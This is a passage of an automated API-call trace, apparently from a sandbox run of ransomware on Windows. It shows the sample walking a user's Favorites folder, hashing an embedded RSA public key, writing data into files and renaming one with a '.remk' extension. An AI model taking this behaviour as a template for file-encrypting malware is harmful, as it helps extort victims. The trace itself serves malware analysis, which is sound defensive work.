0x31ee4d8 [0233.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee568 [0233.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee538 [0233.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee520 [0233.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee580 [0233.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee520 | out: hHeap=0x630000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee520 [0233.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee538 | out: hHeap=0x630000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0233.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4f0 | out: hHeap=0x630000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4f0 [0233.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0233.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee550 | out: hHeap=0x630000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee580 | out: hHeap=0x630000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0233.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0233.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4f0 | out: hHeap=0x630000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0233.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0233.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee520 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee568 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee508 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4d8 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4c0 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bbae0 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0233.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0233.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.823] WriteFile (in: hFile=0x640, lpBuffer=0x65e698*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x65e698*, lpNumberOfBytesWritten=0x3adfb14*=0x80, lpOverlapped=0x0) returned 1 [0233.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0233.823] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.823] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0233.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0233.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0233.824] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0233.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0233.824] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.824] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.824] CloseHandle (hObject=0x640) returned 1 [0233.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0233.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0233.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0233.825] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.remk")) returned 1 [0233.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0233.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.826] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0233.827] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0233.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0233.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0233.828] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0233.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.828] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0233.828] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.830] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.830] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.832] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.832] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0233.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.832] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0233.834] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.834] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.834] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.835] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.835] GetLastError () returned 0x0 [0233.835] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.835] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0233.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.835] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.835] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.835] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0233.835] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbae0 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4c0 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbb28 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4d8 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee508 [0233.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee568 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee520 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.836] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee508 | out: hHeap=0x630000) returned 1 [0233.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee520 | out: hHeap=0x630000) returned 1 [0233.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee568 | out: hHeap=0x630000) returned 1 [0233.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee568 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee520 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee508 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee520 | out: hHeap=0x630000) returned 1 [0233.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee508 | out: hHeap=0x630000) returned 1 [0233.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee568 | out: hHeap=0x630000) returned 1 [0233.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.837] GetCurrentThreadId () returned 0x314 [0233.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0233.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c2290 [0233.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0233.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.837] GetCurrentThreadId () returned 0x314 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee568 [0233.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 